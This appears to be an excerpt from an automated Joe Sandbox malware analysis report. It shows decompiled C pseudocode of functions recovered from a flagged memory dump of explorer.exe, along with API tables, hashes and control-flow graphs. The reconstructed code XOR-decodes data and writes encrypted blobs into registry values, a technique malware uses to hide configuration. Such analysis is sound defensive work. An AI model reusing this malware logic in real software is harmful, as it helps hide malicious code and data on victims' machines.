                                                                                                                                                                        							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
                                                                                                                                                                        							_t107 = E007AA43D(_t173);
                                                                                                                                                                        							 *_t151 = _t107;
                                                                                                                                                                        							if(_t107 == 0) {
                                                                                                                                                                        								goto L33;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							do {
                                                                                                                                                                        								L30:
                                                                                                                                                                        								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
                                                                                                                                                                        								_t172 = _t172 + 1;
                                                                                                                                                                        							} while (_t172 <  *_t151);
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v16 = _t172;
                                                                                                                                                                        						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
                                                                                                                                                                        							goto L32;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t115 = _a8;
                                                                                                                                                                        						if(_t115 != 0) {
                                                                                                                                                                        							 *_t115 = _t172;
                                                                                                                                                                        						}
                                                                                                                                                                        						RegCloseKey(_v16);
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(_t172);
                                                                                                                                                                        					_push(_v16);
                                                                                                                                                                        					_t174 = "\\";
                                                                                                                                                                        					_push(_t174);
                                                                                                                                                                        					_t129 = E007A9A07(_v12);
                                                                                                                                                                        					_t177 = _t177 + 0x10;
                                                                                                                                                                        					_v40 = _t129;
                                                                                                                                                                        					if(_t129 == 0) {
                                                                                                                                                                        						goto L32;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( &_v36);
                                                                                                                                                                        					_push(0x20019);
                                                                                                                                                                        					_push(_t172);
                                                                                                                                                                        					_push(_t129);
                                                                                                                                                                        					_t130 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					_push(_v8);
                                                                                                                                                                        					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
                                                                                                                                                                        						_t132 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t139 = E007A9DF2( &_v36, 0x9c4);
                                                                                                                                                                        						_push(_t172);
                                                                                                                                                                        						_push(_t139);
                                                                                                                                                                        						_push(0x7bc9a0);
                                                                                                                                                                        						_v24 = _t139;
                                                                                                                                                                        						_t175 = E007A9A5A(_v32);
                                                                                                                                                                        						_v32 = _t175;
                                                                                                                                                                        						E007A8BAF( &_v24);
                                                                                                                                                                        						_t179 = _t177 + 0x18;
                                                                                                                                                                        						_t143 = E007A9930(_v12);
                                                                                                                                                                        						_push(_t175);
                                                                                                                                                                        						_push(_t143);
                                                                                                                                                                        						_push(_v8);
                                                                                                                                                                        						_v24 = _t143;
                                                                                                                                                                        						_t144 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
                                                                                                                                                                        							_t150 = _a12;
                                                                                                                                                                        							if(_t150 != 0) {
                                                                                                                                                                        								 *_t150 = 1;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A8BF4( &_v32, 0xfffffffe);
                                                                                                                                                                        						E007A8BF4( &_v24, 0xfffffffe);
                                                                                                                                                                        						_t177 = _t179 + 0x10;
                                                                                                                                                                        						_t174 = "\\";
                                                                                                                                                                        					}
                                                                                                                                                                        					_t135 = E007A9A07(_v12);
                                                                                                                                                                        					_t167 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t177 = _t177 + 0x18;
                                                                                                                                                                        					_t173 = _t135;
                                                                                                                                                                        					_v20 = _t173;
                                                                                                                                                                        					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
                                                                                                                                                                        					E007A8BF4( &_v40, 0xffffffff);
                                                                                                                                                                        					goto L20;
                                                                                                                                                                        				}
                                                                                                                                                                        			}














































                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa841
                                                                                                                                                                        0x007aa7f0
                                                                                                                                                                        0x007aa7fa
                                                                                                                                                                        0x007aa803
                                                                                                                                                                        0x007aa808
                                                                                                                                                                        0x007aa80b
                                                                                                                                                                        0x007aa80e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa810
                                                                                                                                                                        0x007aa814
                                                                                                                                                                        0x007aa815
                                                                                                                                                                        0x007aa81a
                                                                                                                                                                        0x007aa81b
                                                                                                                                                                        0x007aa81e
                                                                                                                                                                        0x007aa822
                                                                                                                                                                        0x007aa827
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa6ab
                                                                                                                                                                        0x007aa6ab
                                                                                                                                                                        0x007aa6b6
                                                                                                                                                                        0x007aa6b8
                                                                                                                                                                        0x007aa6bd
                                                                                                                                                                        0x007aa6c3
                                                                                                                                                                        0x007aa7db
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa7db
                                                                                                                                                                        0x007aa6cc
                                                                                                                                                                        0x007aa6d0
                                                                                                                                                                        0x007aa6d8
                                                                                                                                                                        0x007aa6df
                                                                                                                                                                        0x007aa6e5
                                                                                                                                                                        0x007aa844
                                                                                                                                                                        0x007aa847
                                                                                                                                                                        0x007aa864
                                                                                                                                                                        0x007aa88b
                                                                                                                                                                        0x007aa88e
                                                                                                                                                                        0x007aa890
                                                                                                                                                                        0x007aa892
                                                                                                                                                                        0x007aa892
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x007aa89b
                                                                                                                                                                        0x007aa8a5
                                                                                                                                                                        0x007aa8d4
                                                                                                                                                                        0x007aa8dd
                                                                                                                                                                        0x007aa8e9
                                                                                                                                                                        0x007aa8f1
                                                                                                                                                                        0x007aa8f3
                                                                                                                                                                        0x007aa8f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa900
                                                                                                                                                                        0x007aa8ab
                                                                                                                                                                        0x007aa8b1
                                                                                                                                                                        0x007aa8b6
                                                                                                                                                                        0x007aa8bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8bd
                                                                                                                                                                        0x007aa8bd
                                                                                                                                                                        0x007aa8c9
                                                                                                                                                                        0x007aa8cd
                                                                                                                                                                        0x007aa8ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8d2
                                                                                                                                                                        0x007aa869
                                                                                                                                                                        0x007aa87b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa87d
                                                                                                                                                                        0x007aa882
                                                                                                                                                                        0x007aa884
                                                                                                                                                                        0x007aa884
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x007aa6eb
                                                                                                                                                                        0x007aa6ec
                                                                                                                                                                        0x007aa6ef
                                                                                                                                                                        0x007aa6f4
                                                                                                                                                                        0x007aa6f8
                                                                                                                                                                        0x007aa6fd
                                                                                                                                                                        0x007aa700
                                                                                                                                                                        0x007aa705
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa70e
                                                                                                                                                                        0x007aa70f
                                                                                                                                                                        0x007aa714
                                                                                                                                                                        0x007aa715
                                                                                                                                                                        0x007aa716
                                                                                                                                                                        0x007aa71b
                                                                                                                                                                        0x007aa723
                                                                                                                                                                        0x007aa79b
                                                                                                                                                                        0x007aa7a3
                                                                                                                                                                        0x007aa725
                                                                                                                                                                        0x007aa72a
                                                                                                                                                                        0x007aa72f
                                                                                                                                                                        0x007aa730
                                                                                                                                                                        0x007aa731
                                                                                                                                                                        0x007aa739
                                                                                                                                                                        0x007aa741
                                                                                                                                                                        0x007aa747
                                                                                                                                                                        0x007aa74a
                                                                                                                                                                        0x007aa752
                                                                                                                                                                        0x007aa755
                                                                                                                                                                        0x007aa75a
                                                                                                                                                                        0x007aa75b
                                                                                                                                                                        0x007aa75c
                                                                                                                                                                        0x007aa75f
                                                                                                                                                                        0x007aa762
                                                                                                                                                                        0x007aa76c
                                                                                                                                                                        0x007aa76e
                                                                                                                                                                        0x007aa773
                                                                                                                                                                        0x007aa775
                                                                                                                                                                        0x007aa775
                                                                                                                                                                        0x007aa773
                                                                                                                                                                        0x007aa781
                                                                                                                                                                        0x007aa78c
                                                                                                                                                                        0x007aa791
                                                                                                                                                                        0x007aa794
                                                                                                                                                                        0x007aa794
                                                                                                                                                                        0x007aa7b3
                                                                                                                                                                        0x007aa7b8
                                                                                                                                                                        0x007aa7be
                                                                                                                                                                        0x007aa7c1
                                                                                                                                                                        0x007aa7c3
                                                                                                                                                                        0x007aa7c9
                                                                                                                                                                        0x007aa7d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa7d8

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,007AA621,?,?,00000001), ref: 007AA85F
                                                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 007AA876
                                                                                                                                                                        • RegCloseKey.KERNELBASE(007AA621,?,?,00000001), ref: 007AA8A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3570936880-0
                                                                                                                                                                        • Opcode ID: 8dc8080ade4f16cad1109a01e5cd46d88f4f1248a1e4e0083ac0ccb225d6d234
                                                                                                                                                                        • Instruction ID: dd34783a4bc61c745b1e7d5c8e8add022cd532809b43fab3ccdecbbe270fd1a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8dc8080ade4f16cad1109a01e5cd46d88f4f1248a1e4e0083ac0ccb225d6d234
                                                                                                                                                                        • Instruction Fuzzy Hash: 33917DB1D00209BFDB11DFA8CC45EEEBBB8EF8A710F144269F505A7251D7399A01CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 481 7a66c7-7a670c memset call 7a8bde 484 7a6712-7a6724 call 7a8bde 481->484 485 7a6876-7a687c 481->485 484->485 488 7a672a-7a6747 RegOpenKeyExW 484->488 489 7a674d-7a6780 488->489 490 7a6846-7a684a 488->490 495 7a6792-7a6797 489->495 496 7a6782-7a678d 489->496 491 7a684c-7a6854 RegCloseKey 490->491 492 7a6857-7a6873 call 7a8bf4 * 2 490->492 491->492 492->485 495->490 498 7a679d 495->498 496->490 502 7a67a0-7a67ef call 7a8d6d * 2 498->502 508 7a6839-7a6840 502->508 509 7a67f1-7a6801 502->509 508->490 508->502 511 7a6803-7a6817 509->511 512 7a6836 509->512 511->512 514 7a6819-7a6826 call 7aa456 511->514 512->508 517 7a6828-7a682a 514->517 518 7a682f-7a6831 call 7abfdb 514->518 517->518 518->512
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E007A66C7(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				char _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				char _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				void _v576;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				int _t89;
                                                                                                                                                                        				intOrPtr _t90;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				char _t97;
                                                                                                                                                                        				short* _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        
                                                                                                                                                                        				_t108 = __fp0;
                                                                                                                                                                        				_t96 = __edx;
                                                                                                                                                                        				_t89 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				memset( &_v576, 0, 0x208);
                                                                                                                                                                        				_v28 = 0x104;
                                                                                                                                                                        				_v20 = 0x3fff;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_t98 = E007A8BDE(0x3fff);
                                                                                                                                                                        				_t100 = _t99 + 0x10;
                                                                                                                                                                        				_v32 = _t98;
                                                                                                                                                                        				if(_t98 == 0) {
                                                                                                                                                                        					L18:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t97 = E007A8BDE(0x800);
                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                        				if(_t97 == 0) {
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                                                                                                                                                        					L15:
                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                        						RegCloseKey(_v8);
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8BF4( &_v32, 0x3fff);
                                                                                                                                                                        					E007A8BF4( &_v36, 0x800);
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push( &_v56);
                                                                                                                                                                        				_push( &_v40);
                                                                                                                                                                        				_push( &_v44);
                                                                                                                                                                        				_push( &_v48);
                                                                                                                                                                        				_push( &_v24);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v28);
                                                                                                                                                                        				_push( &_v576);
                                                                                                                                                                        				_t72 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        				_push(_v8);
                                                                                                                                                                        				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                                                                                                                                                        					__eflags = _v24;
                                                                                                                                                                        					if(_v24 == 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						E007A8D6D(_t97, 0, 0x800);
                                                                                                                                                                        						E007A8D6D(_t98, 0, 0x3fff);
                                                                                                                                                                        						_t100 = _t100 + 0x18;
                                                                                                                                                                        						_v20 = 0x3fff;
                                                                                                                                                                        						_v16 = 0x800;
                                                                                                                                                                        						 *_t98 = 0;
                                                                                                                                                                        						_t80 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                                                                                                                                                        						__eflags = _t81;
                                                                                                                                                                        						if(_t81 == 0) {
                                                                                                                                                                        							_t82 =  *0x7bf824; // 0xeaf990
                                                                                                                                                                        							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                                                                                                                                                        							__eflags = _t90;
                                                                                                                                                                        							if(_t90 != 0) {
                                                                                                                                                                        								_t92 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                                                                                                                                                        								__eflags = _a16;
                                                                                                                                                                        								if(_a16 != 0) {
                                                                                                                                                                        									_t85 = E007AA456(_t90);
                                                                                                                                                                        									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                                                                                                                                                        									}
                                                                                                                                                                        									E007ABFDB(_t90, _t96, __eflags, _t108);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t89 = _v12;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t89 = _t89 + 1;
                                                                                                                                                                        						_v12 = _t89;
                                                                                                                                                                        						__eflags = _t89 - _v24;
                                                                                                                                                                        					} while (_t89 < _v24);
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t87 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                                                                                                                                                        				goto L15;
                                                                                                                                                                        			}































                                                                                                                                                                        0x007a6813
                                                                                                                                                                        0x007a6817
                                                                                                                                                                        0x007a681b
                                                                                                                                                                        0x007a6820
                                                                                                                                                                        0x007a6826
                                                                                                                                                                        0x007a6828
                                                                                                                                                                        0x007a682a
                                                                                                                                                                        0x007a682a
                                                                                                                                                                        0x007a6831
                                                                                                                                                                        0x007a6831
                                                                                                                                                                        0x007a6817
                                                                                                                                                                        0x007a6836
                                                                                                                                                                        0x007a6836
                                                                                                                                                                        0x007a6839
                                                                                                                                                                        0x007a683a
                                                                                                                                                                        0x007a683d
                                                                                                                                                                        0x007a683d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a67a0
                                                                                                                                                                        0x007a6782
                                                                                                                                                                        0x007a678a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007A66E5
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 007A673F
                                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00000001), ref: 007A6854
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCloseHeapOpenmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4244679422-0
                                                                                                                                                                        • Opcode ID: c4ac25866d7e5cd132b8555e86d9fb88a84a31c1718c3202a71764e751102ee7
                                                                                                                                                                        • Instruction ID: d4a3575016e5d058b8b44b99f90f197074f4d0782b3887212a497653b1c0ec99
                                                                                                                                                                        • Opcode Fuzzy Hash: c4ac25866d7e5cd132b8555e86d9fb88a84a31c1718c3202a71764e751102ee7
                                                                                                                                                                        • Instruction Fuzzy Hash: 73514C71A00209AFDB11EF98CD89FEE7BBCBF49700F148169F505A6151DB399A448BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E007AAC4B(signed int __ecx, char __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                                                                                                                                                        				char* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char* _v32;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				char _v328;
                                                                                                                                                                        				char _v2832;
                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				char* _t52;
                                                                                                                                                                        				long _t70;
                                                                                                                                                                        				long _t77;
                                                                                                                                                                        				long _t80;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				char _t86;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				char* _t107;
                                                                                                                                                                        				char _t109;
                                                                                                                                                                        
                                                                                                                                                                        				_t46 = __ecx;
                                                                                                                                                                        				_t86 = __edx;
                                                                                                                                                                        				_v24 = __ecx;
                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                        					L13:
                                                                                                                                                                        					_t47 = _t46 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t47;
                                                                                                                                                                        					return _t47;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t116 = __edx;
                                                                                                                                                                        					if(__edx == 0) {
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v28 = E007AA907();
                                                                                                                                                                        					E007B3548( *((intOrPtr*)(__ecx + 0x108)) + __edx,  &_v2832);
                                                                                                                                                                        					_t52 = E007B3674(_t116, __fp0,  &_v2832, 0, 0x64);
                                                                                                                                                                        					_t109 = _a8;
                                                                                                                                                                        					_v12 = _t52;
                                                                                                                                                                        					_v20 = _t52 + 6 + _t109;
                                                                                                                                                                        					_t107 = E007A8BDE(_t52 + 6 + _t109);
                                                                                                                                                                        					_v32 = _t107;
                                                                                                                                                                        					if(_t107 != 0) {
                                                                                                                                                                        						 *_t107 = _a12;
                                                                                                                                                                        						_t14 =  &(_t107[6]); // 0x6
                                                                                                                                                                        						_t107[1] = 1;
                                                                                                                                                                        						_t107[2] = _t109;
                                                                                                                                                                        						E007A8CBB(_t14, _a4, _t109);
                                                                                                                                                                        						_t19 = _t109 + 6; // 0x6
                                                                                                                                                                        						E007B351A( &_v2832, _t19 + _t107, _v12);
                                                                                                                                                                        						_v16 = _t86;
                                                                                                                                                                        						_t87 = _v24;
                                                                                                                                                                        						_v12 =  *((intOrPtr*)(_t87 + 0x108));
                                                                                                                                                                        						_push( &_v52);
                                                                                                                                                                        						_t103 = 8;
                                                                                                                                                                        						E007B06CC( &_v16, _t103, __eflags);
                                                                                                                                                                        						_push( &_v328);
                                                                                                                                                                        						_t104 = 0x14;
                                                                                                                                                                        						E007B02AE( &_v52, _t104);
                                                                                                                                                                        						_push( &_v328);
                                                                                                                                                                        						E007B0320(_t107, _v20);
                                                                                                                                                                        						_t70 = E007AA5D3(_t87);
                                                                                                                                                                        						_v12 = _t70;
                                                                                                                                                                        						__eflags = _t70;
                                                                                                                                                                        						if(_t70 != 0) {
                                                                                                                                                                        							E007AA035(_v28,  &_v64, 0x10);
                                                                                                                                                                        							_t77 = RegOpenKeyExA( *(_t87 + 0x10c), _v12, 0, 2,  &_a4);
                                                                                                                                                                        							__eflags = _t77;
                                                                                                                                                                        							if(_t77 == 0) {
                                                                                                                                                                        								_t80 = RegSetValueExA(_a4,  &_v64, 0, 3, _t107, _v20);
                                                                                                                                                                        								__eflags = _t80;
                                                                                                                                                                        								if(_t80 != 0) {
                                                                                                                                                                        									_push(0xfffffffc);
                                                                                                                                                                        									_pop(0);
                                                                                                                                                                        								}
                                                                                                                                                                        								RegCloseKey(_a4);
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_push(0xfffffffd);
                                                                                                                                                                        								_pop(0);
                                                                                                                                                                        							}
                                                                                                                                                                        							E007A8BF4( &_v12, 0xffffffff);
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A8BF4( &_v32, 0);
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t85 = 0xfffffffe;
                                                                                                                                                                        					return _t85;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        0x007aad11
                                                                                                                                                                        0x007aad17
                                                                                                                                                                        0x007aad1a
                                                                                                                                                                        0x007aad1b
                                                                                                                                                                        0x007aad26
                                                                                                                                                                        0x007aad29
                                                                                                                                                                        0x007aad2d
                                                                                                                                                                        0x007aad3b
                                                                                                                                                                        0x007aad3e
                                                                                                                                                                        0x007aad4a
                                                                                                                                                                        0x007aad4f
                                                                                                                                                                        0x007aad52
                                                                                                                                                                        0x007aad54
                                                                                                                                                                        0x007aad5e
                                                                                                                                                                        0x007aad79
                                                                                                                                                                        0x007aad7c
                                                                                                                                                                        0x007aad7e
                                                                                                                                                                        0x007aad99
                                                                                                                                                                        0x007aad9c
                                                                                                                                                                        0x007aad9e
                                                                                                                                                                        0x007aada0
                                                                                                                                                                        0x007aada2
                                                                                                                                                                        0x007aada2
                                                                                                                                                                        0x007aadab
                                                                                                                                                                        0x007aad80
                                                                                                                                                                        0x007aad80
                                                                                                                                                                        0x007aad82
                                                                                                                                                                        0x007aad82
                                                                                                                                                                        0x007aadb4
                                                                                                                                                                        0x007aadba
                                                                                                                                                                        0x007aadc1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aadc8
                                                                                                                                                                        0x007aacce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aacce

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007B3674: lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 007B36BB
                                                                                                                                                                          • Part of subcall function 007B3674: _ftol2_sse.MSVCRT ref: 007B36FE
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 007AAD79
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeapOpen_ftol2_sselstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 15040926-0
                                                                                                                                                                        • Opcode ID: d182efa175fd1f34ea7f3ed7de4881643febf97d17b4bc23453a73d745547239
                                                                                                                                                                        • Instruction ID: 07701d179cfac3b2de6ca02cc13eb941a242ba21e4cdb48d361ee31b75807642
                                                                                                                                                                        • Opcode Fuzzy Hash: d182efa175fd1f34ea7f3ed7de4881643febf97d17b4bc23453a73d745547239
                                                                                                                                                                        • Instruction Fuzzy Hash: 97418272A00219BBCF11DFA4DC45FDEBBB8AF45320F144266F51497291EB78EA44CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 561 7a8ac6-7a8ae2 562 7a8b0b-7a8b20 561->562 563 7a8ae4 561->563 565 7a8b22-7a8b28 562->565 566 7a8b35-7a8b3b 562->566 564 7a8ae6-7a8afe 563->564 567 7a8b00-7a8b03 564->567 568 7a8b07-7a8b09 564->568 565->565 569 7a8b2a-7a8b2f 565->569 570 7a8b49-7a8b65 lstrlenA call 7a8bde 566->570 571 7a8b3d-7a8b47 566->571 567->564 572 7a8b05 567->572 568->562 569->566 573 7a8b31-7a8b33 569->573 576 7a8b6e-7a8b70 570->576 577 7a8b67-7a8b6c 570->577 571->570 571->571 572->562 573->571 579 7a8b72 576->579 580 7a8b95 576->580 578 7a8b97-7a8b9b 577->578 581 7a8b75-7a8b93 579->581 580->578 581->580 581->581
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007A8AC6(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        
                                                                                                                                                                        				_t74 = _a12;
                                                                                                                                                                        				_t54 = 0;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_v16 = 0x5a;
                                                                                                                                                                        				if(_t74 >= __edx) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                        					_t76 = 0;
                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                        					if(_v36 == 0) {
